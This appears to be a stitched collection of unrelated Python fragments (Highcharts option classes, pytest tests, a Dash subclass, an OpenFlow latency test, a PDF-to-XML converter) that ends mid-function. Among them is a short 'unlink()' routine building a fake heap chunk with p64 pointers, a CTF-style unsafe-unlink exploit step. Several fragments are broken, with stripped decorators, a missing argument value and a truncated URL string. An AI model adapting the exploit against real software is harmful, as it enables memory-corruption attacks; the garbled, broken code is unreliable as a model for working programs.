assert (fyh.is_valid_quarter(2) is True)
assert (fyh.is_valid_quarter(3) is True)
assert (fyh.is_valid_quarter(4) is True)
assert (fyh.is_valid_quarter(0) is False)
assert (fyh.is_valid_quarter(5) is False)
assert (fyh.is_valid_quarter(None) is False)
assert (fyh.is_valid_quarter('1') is False)
assert (fyh.is_valid_quarter('a') is False)
assert (fyh.is_valid_quarter({'hello': 'there'}) is False) |
class OptionExportingButtonsContextbutton(Options):
def _titleKey(self):
return self._config_get(None)
_titleKey.setter
def _titleKey(self, text: str):
self._config(text, js_type=False)
def align(self):
return self._config_get('right')
def align(self, text: str):
self._config(text, js_type=False)
def buttonSpacing(self):
return self._config_get(3)
def buttonSpacing(self, num: float):
self._config(num, js_type=False)
def className(self):
return self._config_get('highcharts-contextbutton')
def className(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def height(self):
return self._config_get(28)
def height(self, num: float):
self._config(num, js_type=False)
def menuClassName(self):
return self._config_get('highcharts-contextmenu')
def menuClassName(self, text: str):
self._config(text, js_type=False)
def menuItems(self):
return self._config_get(['viewFullscreen', 'printChart', 'separator', 'downloadPNG', 'downloadJPEG', 'downloadPDF', 'downloadSVG'])
def menuItems(self, value: Any):
self._config(value, js_type=False)
def onclick(self):
return self._config_get(None)
def onclick(self, value: Any):
self._config(value, js_type=False)
def symbol(self):
return self._config_get('menu')
def symbol(self, text: str):
self._config(text, js_type=False)
def symbolFill(self):
return self._config_get('#666666')
def symbolFill(self, text: str):
self._config(text, js_type=False)
def symbolSize(self):
return self._config_get(14)
def symbolSize(self, num: float):
self._config(num, js_type=False)
def symbolStroke(self):
return self._config_get('#666666')
def symbolStroke(self, text: str):
self._config(text, js_type=False)
def symbolStrokeWidth(self):
return self._config_get(3)
def symbolStrokeWidth(self, num: float):
self._config(num, js_type=False)
def symbolX(self):
return self._config_get(14.5)
def symbolX(self, num: float):
self._config(num, js_type=False)
def symbolY(self):
return self._config_get(13.5)
def symbolY(self, num: float):
self._config(num, js_type=False)
def text(self):
return self._config_get('null')
def text(self, text: str):
self._config(text, js_type=False)
def theme(self) -> 'OptionExportingButtonsContextbuttonTheme':
return self._config_sub_data('theme', OptionExportingButtonsContextbuttonTheme)
def titleKey(self):
return self._config_get('contextButtonTitle')
def titleKey(self, text: str):
self._config(text, js_type=False)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False)
def verticalAlign(self):
return self._config_get('top')
def verticalAlign(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(28)
def width(self, num: float):
self._config(num, js_type=False)
def x(self):
return self._config_get((- 10))
def x(self, num: float):
self._config(num, js_type=False)
def y(self):
return self._config_get(0)
def y(self, num: float):
self._config(num, js_type=False) |
def test_align_convert_degen_bases(o_dir, e_dir, request):
program = 'bin/align/phyluce_align_convert_degen_bases'
output = os.path.join(o_dir, 'mafft-degen-bases-converted')
cmd = [os.path.join(request.config.rootdir, program), '--alignments', os.path.join(e_dir, 'mafft-degen-bases'), '--output', output, '--input-format', 'fasta', '--output-format', 'nexus', '--cores', '1']
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = proc.communicate()
assert (proc.returncode == 0), print('{}'.format(stderr.decode('utf-8')))
output_files = glob.glob(os.path.join(output, '*'))
assert output_files, 'There are no output files'
for output_file in output_files:
name = os.path.basename(output_file)
print(name)
expected_file = os.path.join(e_dir, 'mafft-degen-bases-converted', name)
observed = open(output_file).read()
expected = open(expected_file).read()
assert (observed == expected) |
class DashCustom(Dash):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.requests_pathname_external_prefix = self.config.requests_pathname_prefix
def _config(self):
config = super()._config()
config.update({'url_base_pathname': self.config.url_base_pathname, 'requests_pathname_prefix': self.requests_pathname_external_prefix, 'ui': self._dev_tools.ui, 'props_check': self._dev_tools.props_check, 'show_undo_redo': self.config.show_undo_redo, 'suppress_callback_exceptions': self.config.suppress_callback_exceptions, 'update_title': self.config.update_title})
if self._dev_tools.hot_reload:
config['hot_reload'] = {'interval': int((self._dev_tools.hot_reload_interval * 1000)), 'max_retry': self._dev_tools.hot_reload_max_retry}
if (self.validation_layout and (not self.config.suppress_callback_exceptions)):
config['validation_layout'] = self.validation_layout
return config |
class OptionSeriesWindbarbSonificationTracksMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesWindbarbSonificationTracksMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesWindbarbSonificationTracksMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesWindbarbSonificationTracksMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesWindbarbSonificationTracksMappingLowpassResonance) |
def get_bert_feature(text, word2ph):
with torch.no_grad():
inputs = tokenizer(text, return_tensors='pt')
for i in inputs:
inputs[i] = inputs[i].to(device)
res = model(**inputs, output_hidden_states=True)
res = torch.cat(res['hidden_states'][(- 3):(- 2)], (- 1))[0].cpu()
assert (len(word2ph) == (len(text) + 2))
word2phone = word2ph
phone_level_feature = []
for i in range(len(word2phone)):
repeat_feature = res[i].repeat(word2phone[i], 1)
phone_level_feature.append(repeat_feature)
phone_level_feature = torch.cat(phone_level_feature, dim=0)
return phone_level_feature.T |
def parse_var_keywords(test_str: str) -> tuple[(list[str], str)]:
keyword_match = FRegex.KEYWORD_LIST.match(test_str)
keywords = []
while keyword_match:
tmp_str = re.sub('^[, ]*', '', keyword_match.group(0))
test_str = test_str[keyword_match.end(0):]
if tmp_str.lower().startswith('dimension'):
match_char = find_paren_match(test_str)
if (match_char < 0):
break
else:
tmp_str += test_str[:(match_char + 1)]
test_str = test_str[(match_char + 1):]
tmp_str = re.sub('^[, ]*', '', tmp_str)
keywords.append(tmp_str.strip().upper())
keyword_match = FRegex.KEYWORD_LIST.match(test_str)
return (keywords, test_str) |
class DebugConfig():
instance = None
def __init__(self):
self.debug_dir = None
self.debugging = False
def set_debugging(self, debugging):
self.debugging = debugging
def set_debug_dir(self, debug_dir):
if (not self.debugging):
return
self.debug_dir = debug_dir
if (not os.path.isdir(debug_dir)):
os.mkdir(debug_dir)
def clear_debug_dir(self):
if (not self.debugging):
return
if os.path.isdir(self.debug_dir):
shutil.rmtree(self.debug_dir)
os.mkdir(self.debug_dir)
def get_instance():
if (not DebugConfig.instance):
DebugConfig.instance = DebugConfig()
return DebugConfig.instance |
class DataplaneLatency(base_tests.SimpleDataPlane):
def runTest(self):
(in_port, out_port) = openflow_ports(2)
delete_all_flows(self.controller)
pkt = str(simple_tcp_packet())
request = ofp.message.flow_add(match=ofp.match(wildcards=ofp.OFPFW_ALL), buffer_id=, actions=[ofp.action.output(out_port)])
self.controller.message_send(request)
do_barrier(self.controller)
latencies = []
for i in xrange(0, 1000):
start_time = time.time()
self.dataplane.send(in_port, pkt)
verify_packet(self, pkt, out_port)
end_time = time.time()
latencies.append((end_time - start_time))
latencies.sort()
latency_min = latencies[0]
latency_90 = latencies[int((len(latencies) * 0.9))]
latency_max = latencies[(- 1)]
logging.debug('Minimum latency: %f ms', (latency_min * 1000.0))
logging.debug('90%% latency: %f ms', (latency_90 * 1000.0))
logging.debug('Maximum latency: %f ms', (latency_max * 1000.0))
self.assertGreater(config['default_timeout'], latency_max)
self.assertGreater(config['default_negative_timeout'], latency_90) |
def test_raises_error_when_variables_not_datetime(df_datetime):
with pytest.raises(TypeError):
DatetimeFeatures(variables=['Age']).fit(df_datetime)
with pytest.raises(TypeError):
DatetimeFeatures(variables=['Name', 'Age', 'date_obj1']).fit(df_datetime)
with pytest.raises(TypeError):
DatetimeFeatures(variables='index').fit(df_datetime)
with pytest.raises(ValueError):
DatetimeFeatures().fit(df_datetime[['Name', 'Age']]) |
class OptionSeriesItemSonificationDefaultinstrumentoptionsMapping(Options):
def frequency(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency':
return self._config_sub_data('frequency', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency)
def gapBetweenNotes(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingGapbetweennotes':
return self._config_sub_data('gapBetweenNotes', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingGapbetweennotes)
def highpass(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingHighpass':
return self._config_sub_data('highpass', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingHighpass)
def lowpass(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingLowpass':
return self._config_sub_data('lowpass', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingLowpass)
def noteDuration(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingNoteduration':
return self._config_sub_data('noteDuration', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingNoteduration)
def pan(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPan':
return self._config_sub_data('pan', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPan)
def pitch(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPitch':
return self._config_sub_data('pitch', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPitch)
def playDelay(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPlaydelay':
return self._config_sub_data('playDelay', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPlaydelay)
def time(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTime':
return self._config_sub_data('time', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTime)
def tremolo(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTremolo':
return self._config_sub_data('tremolo', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTremolo)
def volume(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingVolume':
return self._config_sub_data('volume', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingVolume) |
class OptionSeriesHeatmapSonificationTracksMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class BrowseUsersTests(DatabaseTestCase):
def setUp(self):
super().setUp()
session = Session()
self.user = models.User(email='', username='user')
user_social_auth = social_models.UserSocialAuth(user_id=self.user.id, user=self.user)
session.add(self.user)
session.add(user_social_auth)
self.admin = models.User(email='', username='admin', admin=True)
admin_social_auth = social_models.UserSocialAuth(user_id=self.admin.id, user=self.admin)
session.add_all([admin_social_auth, self.admin])
session.commit()
self.client = self.flask_app.test_client()
def test_non_admin_get(self):
with login_user(self.flask_app, self.user):
output = self.client.get('/users')
self.assertEqual(401, output.status_code)
def test_admin_get(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertTrue((b'' in output.data))
def test_pages(self):
with login_user(self.flask_app, self.admin):
page_one = self.client.get('/users?limit=1&page=1')
self.assertEqual(200, page_one.status_code)
self.assertTrue((b'' in page_one.data))
self.assertFalse((b'' in page_one.data))
def test_pagination_offset(self):
with login_user(self.flask_app, self.admin):
page = self.client.get('/users?limit=1&page=2')
self.assertEqual(200, page.status_code)
self.assertFalse((b'' in page.data))
self.assertTrue((b'' in page.data))
def test_pagination_limit_zero(self):
with login_user(self.flask_app, self.admin):
page = self.client.get('/users?limit=0&page=1')
self.assertEqual(200, page.status_code)
self.assertTrue((b'' in page.data))
self.assertTrue((b'' in page.data))
def test_pagination_limit_negative(self):
with login_user(self.flask_app, self.admin):
page = self.client.get('/users?limit=-1')
self.assertEqual(200, page.status_code)
self.assertTrue((b'' in page.data))
self.assertTrue((b'' in page.data))
def test_pagination_invalid_page(self):
with login_user(self.flask_app, self.admin):
page_one = self.client.get('/users?limit=1&page=dummy')
self.assertEqual(200, page_one.status_code)
self.assertTrue((b'' in page_one.data))
self.assertFalse((b'' in page_one.data))
def test_pagination_invalid_limit(self):
with login_user(self.flask_app, self.admin):
page_one = self.client.get('/users?limit=dummy&page=1')
self.assertEqual(200, page_one.status_code)
self.assertTrue((b'' in page_one.data))
self.assertTrue((b'' in page_one.data))
def test_filter_user_id(self):
with login_user(self.flask_app, self.admin):
output = self.client.get(f'/users?user_id={six.text_type(self.admin.id)}')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_user_id_wrong(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?user_id=dummy')
self.assertEqual(200, output.status_code)
self.assertFalse((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_username(self):
with login_user(self.flask_app, self.admin):
output = self.client.get(f'/users?username={self.admin.username}')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_username_wrong(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?username=dummy')
self.assertEqual(200, output.status_code)
self.assertFalse((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_email(self):
with login_user(self.flask_app, self.admin):
output = self.client.get(f'/users?email={self.admin.email}')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_email_wrong(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?email=dummy')
self.assertEqual(200, output.status_code)
self.assertFalse((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_admin_true(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?admin=True')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_admin_false(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?admin=False')
self.assertEqual(200, output.status_code)
self.assertFalse((b'' in output.data))
self.assertTrue((b'' in output.data))
def test_filter_admin_wrong(self):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?admin=dummy')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertTrue((b'' in output.data))
def test_filter_active_true(self):
user = models.User(email='', username='inactive', active=False)
user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
self.session.add(user)
self.session.add(user_social_auth)
self.session.commit()
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?active=True')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertTrue((b'' in output.data))
self.assertFalse((b'' in output.data))
def test_filter_active_false(self):
user = models.User(email='', username='inactive', active=False)
user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
self.session.add(user)
self.session.add(user_social_auth)
self.session.commit()
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?active=False')
self.assertEqual(200, output.status_code)
self.assertFalse((b'' in output.data))
self.assertFalse((b'' in output.data))
self.assertTrue((b'' in output.data))
def test_filter_active_wrong(self):
user = models.User(email='', username='inactive', active=False)
user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
self.session.add(user)
self.session.add(user_social_auth)
self.session.commit()
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?active=dummy')
self.assertEqual(200, output.status_code)
self.assertTrue((b'' in output.data))
self.assertTrue((b'' in output.data))
self.assertTrue((b'' in output.data))
def test_sql_exception(self):
with mock.patch.object(Query, 'filter_by', mock.Mock(side_effect=[SQLAlchemyError('SQLError'), None])):
with login_user(self.flask_app, self.admin):
output = self.client.get('/users?user_id=dummy')
self.assertEqual(200, output.status_code)
self.assertTrue((b'SQLError' in output.data))
self.assertFalse((b'' in output.data))
self.assertFalse((b'' in output.data)) |
class ArrowGlacierUnsignedLegacyTransaction(LondonUnsignedLegacyTransaction):
def as_signed_transaction(self, private_key: PrivateKey, chain_id: int=None) -> ArrowGlacierLegacyTransaction:
(v, r, s) = create_transaction_signature(self, private_key, chain_id=chain_id)
return ArrowGlacierLegacyTransaction(nonce=self.nonce, gas_price=self.gas_price, gas=self.gas, to=self.to, value=self.value, data=self.data, v=v, r=r, s=s) |
class Object(Entity):
INFO = {'make': ['sensors', 'actuators', 'engine_states']}
def make(cls, *args: Any, **kwargs: Any):
pass
def pre_make(cls, entity_id, entity_type):
spec = super().pre_make(entity_id, entity_type)
params = spec.params
params['config'] = dict(name=None, sensors=[], actuators=[], states=[], entity_id=params.pop('entity_id'))
params['sensors'] = dict()
params['actuators'] = dict()
params['states'] = dict()
from eagerx.core.specs import ObjectSpec
return ObjectSpec(params)
def check_spec(cls, spec):
super().check_spec(spec)
entity_id = spec.config.entity_id
name = spec.config.name
for component in ['states']:
for (cname, params) in getattr(spec, component).items():
msg = f'"{cname}" was defined as {component[:(- 1)]} in "{name}", but its space ({type(params.space)}) is not a valid space. Check the spec of "{entity_id}".'
assert (params.space is not None), msg
def example_engine(self, spec: 'ObjectSpec', graph: 'EngineGraph') -> None:
raise NotImplementedError('This is a mock engine implementation for documentation purposes.') |
class Scene(QCScene):
def __init__(self, attributes):
self._attributes = attributes
self.name = self._get_attribute('Name')
self.make_index = self._get_attribute('MakeIndex')
self.index = self._get_attribute('Idx')
self.split_horizontal = self._get_attribute('SplitHorizontal')
self.save_image = self._get_attribute('Keep')
self.order = self._get_attribute('Order')
self.index_title = self._get_attribute('IndexTitle', manditory=False)
self.subject_title = self._get_attribute('PreTitle', manditory=False)
self.width = self.__get_width()
self.height = self.__get_height()
def make_image(self, output_loc, scene_file, logging='WARNING'):
if self.split_horizontal:
self.path = self.__split(output_loc, scene_file, logging, self.width, self.height)
return
self.__show_scene(output_loc, scene_file, logging, self.width, self.height)
self.path = output_loc
def __get_width(self):
width = self._get_attribute('Width', manditory=False)
if (not width):
width = 600
return width
def __get_height(self):
height = self._get_attribute('Height', manditory=False)
if (not height):
height = 400
return height
def __show_scene(self, output, scene_file, logging, width, height):
run(['wb_command', '-logging', logging, '-show-scene', scene_file, str(self.index), output, str(width), str(height)])
def __split(self, output_loc, scene_file, logging, width, height):
with TempDir() as tmp_dir:
tmp_img = os.path.join(tmp_dir, 'scene{}.png'.format(self.index))
self.__show_scene(tmp_img, scene_file, logging, width, height)
with Image.open(tmp_img) as img:
half_the_height = (height // 2)
img_top = img.crop((0, 0, width, half_the_height))
img_btm = img.crop((0, half_the_height, width, height))
im2 = Image.new('RGBA', (int((width * 2)), half_the_height))
im2.paste(img_top, (0, 0))
im2.paste(img_btm, (width, 0))
im2.save(output_loc)
return output_loc
def __repr__(self):
return '<ciftify.qc_config.Scene({})>'.format(self.name)
def __str__(self):
return self.name |
class JsD3Bubble():
alias = 'D3'
chartTypes = ['gravity']
params = ('seriesNames', 'xAxis')
value = "\n nbSeries = seriesNames.length;\n var temp = {}; var result = [];\n data.forEach(function(rec){\n for (var key in rec){\n if(key != xAxis && rec[key] != 0 && seriesNames.includes(key))\n { \n result.push({'Name': rec[xAxis], 'Count': rec[key], 'Category': key, 'nbSeries': nbSeries, 'xAxis': xAxis, 'seriesNames': seriesNames});\n } \n }\n });\n " |
.parametrize('encoder, df_test, df_expected', [(DecisionTreeEncoder(), pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [21, 30, 21, 30, 51, 40]}, index=[101, 105, 42, 76, 88, 92]), pd.DataFrame({'x': [25.5, 25.5, 25.5, 25.5, 45.5, 45.5]}, index=[101, 105, 42, 76, 88, 92])), (MeanEncoder(), pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [1, 0, 1, 0, 1, 0]}, index=[101, 105, 42, 76, 88, 92]), pd.DataFrame({'x': [0.5, 0.5, 0.5, 0.5, 0.5, 0.5]}, index=[101, 105, 42, 76, 88, 92])), (OrdinalEncoder(encoding_method='ordered'), pd.DataFrame({'x': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], 'y': [3, 3, 3, 2, 2, 2, 1, 1, 1]}, index=[33, 5412, 66, 99, 334, 1212, 22, 555, 1]), pd.DataFrame({'x': [2, 2, 2, 1, 1, 1, 0, 0, 0]}, index=[33, 5412, 66, 99, 334, 1212, 22, 555, 1])), (WoEEncoder(), pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [1, 0, 1, 0, 1, 0]}, index=[101, 105, 42, 76, 88, 92]), pd.DataFrame({'x': [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]}, index=[101, 105, 42, 76, 88, 92]))])
def test_encoders_when_x_pandas_y_numpy(encoder, df_test, df_expected):
X = df_test[['x']]
y = df_test['y']
y_2 = y.to_numpy()
df_result = encoder.fit_transform(X, y_2)
assert df_result.equals(df_expected) |
class TestContentMatcher(unittest.TestCase):
def num_matches(self, pattern, text, **kwargs):
cm = ContentMatcher(pattern, **kwargs)
return len(list(cm.match_file(StringIO(text))))
def assertMatches(self, cm, text, exp_matches):
matches = list(cm.match_file(StringIO(text)))
self.assertEqual(len(matches), len(exp_matches))
textlines = text.split('\n')
for (n, exp_match) in enumerate(exp_matches):
exp_matchresult = MatchResult((textlines[(exp_match[0] - 1)] + '\n'), exp_match[0], exp_match[1])
self.assertEqual(exp_matchresult, matches[n])
def test_defaults(self):
cm = ContentMatcher('line')
self.assertMatches(cm, text1, [(1, [(5, 9)]), (2, [(8, 12)]), (3, [(9, 13), (24, 28)]), (6, [(9, 13)]), (7, [(5, 9), (15, 19), (35, 39)])])
cm = ContentMatcher('Line')
self.assertMatches(cm, text1, [(5, [(10, 14)])])
cm = ContentMatcher('L[ix]ne')
self.assertMatches(cm, text1, [(5, [(10, 14)])])
cm = ContentMatcher('upper')
self.assertMatches(cm, text1, [])
def test_regex_match(self):
self.assertEqual(self.num_matches('yes\\?', text1), 1)
self.assertEqual(self.num_matches('yes?', text1), 2)
self.assertEqual(self.num_matches('vector', text1), 2)
self.assertEqual(self.num_matches('vector *<', text1), 2)
self.assertEqual(self.num_matches('vector +<', text1), 1)
def test_id_regex_match_detailed(self):
t1 = 'some line with id_4 and vec8f too'
self.assertEqual(self.num_matches('id_4', t1), 1)
self.assertEqual(self.num_matches('8f', t1), 1)
self.assertEqual(self.num_matches('[0-9]f', t1), 1)
self.assertEqual(self.num_matches('8F', t1, ignore_case=True), 1)
self.assertEqual(self.num_matches('84', t1, ignore_case=True), 0)
self.assertEqual(self.num_matches('84', t1, invert_match=True), 1)
def test_ignore_case(self):
cm = ContentMatcher('upper', ignore_case=True)
self.assertMatches(cm, text1, [(5, [(0, 5)])])
def test_invert_match(self):
cm = ContentMatcher('line', invert_match=True)
self.assertMatches(cm, text1, [(4, []), (5, [])])
cm = ContentMatcher('line', invert_match=True, ignore_case=True)
self.assertMatches(cm, text1, [(4, [])])
def test_max_count(self):
cm = ContentMatcher('line', max_match_count=1)
self.assertMatches(cm, text1, [(1, [(5, 9)])])
cm = ContentMatcher('line', max_match_count=2)
self.assertMatches(cm, text1, [(1, [(5, 9)]), (2, [(8, 12)])])
cm = ContentMatcher('a', max_match_count=1)
self.assertMatches(cm, text1, [(2, [(0, 1)])])
def test_whole_words(self):
cm = ContentMatcher('pie', whole_words=True)
self.assertMatches(cm, text2, [(2, [(6, 9), (19, 22)]), (4, [(24, 27)])])
cm = ContentMatcher('.*n', literal_pattern=True)
self.assertMatches(cm, text2, [(4, [(5, 8)])])
cm = ContentMatcher('$\\t', literal_pattern=True)
self.assertMatches(cm, text2, [(3, [(10, 13)])])
cm = ContentMatcher('$\\t', literal_pattern=False)
self.assertMatches(cm, text2, []) |
def test_gauss_edge0():
print('0th Order Polynomial')
print('Edge')
gaussEdge.setOrder(1)
int0_f0 = dot(f0(gaussEdge.points), gaussEdge.weights)
print(int0_f0)
gaussEdge.setOrder(2)
int1_f0 = dot(f0(gaussEdge.points), gaussEdge.weights)
print(int1_f0)
gaussEdge.setOrder(3)
int2_f0 = dot(f0(gaussEdge.points), gaussEdge.weights)
print(int2_f0)
npt.assert_almost_equal(int0_f0, int1_f0)
npt.assert_almost_equal(int1_f0, int2_f0) |
def test_set_voltage_pv1(power: PowerSupply, multi: Multimeter):
voltages = np.arange((- 5), 5, 0.1)
measured = np.zeros(len(voltages))
for (i, v) in enumerate(voltages):
power.pv1 = v
measured[i] = multi.measure_voltage('CH1')
assert (measured == pytest.approx(voltages, rel=(RELTOL * 2), abs=(ABSTOL * 2))) |
class Command(BaseCommand):
help = __doc__
def handle(self, *args, **kwargs):
page_url = '
filename_re = re.compile('^BNF Snomed Mapping data (?P<date>20\\d{6})\\.zip$', re.IGNORECASE)
rsp = requests.get(page_url)
rsp.raise_for_status()
doc = BeautifulSoup(rsp.text, 'html.parser')
matches = []
for a_tag in doc.find_all('a', href=True):
url = urljoin(page_url, a_tag['href'])
filename = Path(unquote(urlparse(url).path)).name
match = filename_re.match(filename)
if match:
matches.append((match.group('date'), url, filename))
if (not matches):
raise RuntimeError(f'Found no URLs matching {filename_re} at {page_url}')
matches.sort()
(datestamp, url, filename) = matches[(- 1)]
release_date = ((((datestamp[:4] + '_') + datestamp[4:6]) + '_') + datestamp[6:])
dir_path = os.path.join(settings.PIPELINE_DATA_BASEDIR, 'bnf_snomed_mapping', release_date)
zip_path = os.path.join(dir_path, filename)
if glob.glob(os.path.join(dir_path, '*.xlsx')):
return
mkdir_p(dir_path)
rsp = requests.get(url, stream=True)
rsp.raise_for_status()
with open(zip_path, 'wb') as f:
for block in rsp.iter_content((32 * 1024)):
f.write(block)
with zipfile.ZipFile(zip_path) as zf:
zf.extractall(dir_path) |
def vote(probs):
if (len(probs) == 0):
return 0
probs = sorted(probs)
if (probs[(len(probs) / 3)] >= 1):
return (probs[(len(probs) / 3)] + 1)
elif (probs[((len(probs) * 2) / 3)] <= (- 1)):
return (probs[((len(probs) * 2) / 3)] - 1)
else:
return probs[(len(probs) / 2)] |
def unlink():
keep(1)
wipe(1)
keep(2)
wipe(1)
keep(1)
keep(3)
wipe(3)
keep(3)
payload = p64(0)
payload += p64(33)
payload += p64((small_ptr - 24))
payload += p64((small_ptr - 16))
payload += p64(32)
payload += p64(400016)
renew(2, payload)
wipe(3) |
def _normal_faba(award):
ta1 = baker.make('references.ToptierAgency', name=f'Agency 00{award.award_id}', toptier_code=f'00{award.award_id}')
baker.make('references.Agency', toptier_agency=ta1, toptier_flag=True, _fill_optional=True)
defc_m = baker.make('references.DisasterEmergencyFundCode', code='M', public_law='PUBLIC LAW FOR CODE M', title='TITLE FOR CODE M', group_name='covid_19')
fa1 = baker.make('accounts.FederalAccount', federal_account_code='001-0000', account_title='FA 1', parent_toptier_agency=ta1)
tas1 = baker.make('accounts.TreasuryAppropriationAccount', budget_function_code=100, budget_function_title='NAME 1', budget_subfunction_code=1100, budget_subfunction_title='NAME 1A', account_title='TA 1', tas_rendering_label='001-X-0000-000', federal_account=fa1, funding_toptier_agency=ta1)
return baker.make('awards.FinancialAccountsByAwards', award=award, treasury_account=tas1, piid='piid 1', parent_award_id='same parent award', fain='fain 1', uri='uri 1', disaster_emergency_fund=defc_m, submission=SubmissionAttributes.objects.all().first(), gross_outlay_amount_by_award_cpe=8) |
class XMLConverter(PDFConverter):
CONTROL = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]')
def __init__(self, rsrcmgr, outfp, pageno=1, laparams=None, imagewriter=None, stripcontrol=False):
PDFConverter.__init__(self, rsrcmgr, outfp, pageno=pageno, laparams=laparams)
self.imagewriter = imagewriter
self.stripcontrol = stripcontrol
self.write_header()
return
def write_header(self):
self.outfp.write('<?xml version="1.0" encoding="utf-8" ?>\n')
self.outfp.write('<pages>\n')
return
def write_footer(self):
self.outfp.write('</pages>\n')
return
def write_text(self, text):
if self.stripcontrol:
text = self.CONTROL.sub(u'', text)
self.outfp.write(q(text))
return
def receive_layout(self, ltpage):
def show_group(item):
if isinstance(item, LTTextBox):
self.outfp.write(('<textbox id="%d" bbox="%s" />\n' % (item.index, bbox2str(item.bbox))))
elif isinstance(item, LTTextGroup):
self.outfp.write(('<textgroup bbox="%s">\n' % bbox2str(item.bbox)))
for child in item:
show_group(child)
self.outfp.write('</textgroup>\n')
return
def render(item):
if isinstance(item, LTPage):
self.outfp.write(('<page id="%s" bbox="%s" rotate="%d">\n' % (item.pageid, bbox2str(item.bbox), item.rotate)))
for child in item:
render(child)
if (item.groups is not None):
self.outfp.write('<layout>\n')
for group in item.groups:
show_group(group)
self.outfp.write('</layout>\n')
self.outfp.write('</page>\n')
elif isinstance(item, LTLine):
self.outfp.write(('<line linewidth="%d" bbox="%s" />\n' % (item.linewidth, bbox2str(item.bbox))))
elif isinstance(item, LTRect):
self.outfp.write(('<rect linewidth="%d" bbox="%s" />\n' % (item.linewidth, bbox2str(item.bbox))))
elif isinstance(item, LTCurve):
self.outfp.write(('<curve linewidth="%d" bbox="%s" pts="%s"/>\n' % (item.linewidth, bbox2str(item.bbox), item.get_pts())))
elif isinstance(item, LTFigure):
self.outfp.write(('<figure name="%s" bbox="%s">\n' % (item.name, bbox2str(item.bbox))))
for child in item:
render(child)
self.outfp.write('</figure>\n')
elif isinstance(item, LTTextLine):
self.outfp.write(('<textline bbox="%s">\n' % bbox2str(item.bbox)))
for child in item:
render(child)
self.outfp.write('</textline>\n')
elif isinstance(item, LTTextBox):
wmode = ''
if isinstance(item, LTTextBoxVertical):
wmode = ' wmode="vertical"'
self.outfp.write(('<textbox id="%d" bbox="%s"%s>\n' % (item.index, bbox2str(item.bbox), wmode)))
for child in item:
render(child)
self.outfp.write('</textbox>\n')
elif isinstance(item, LTChar):
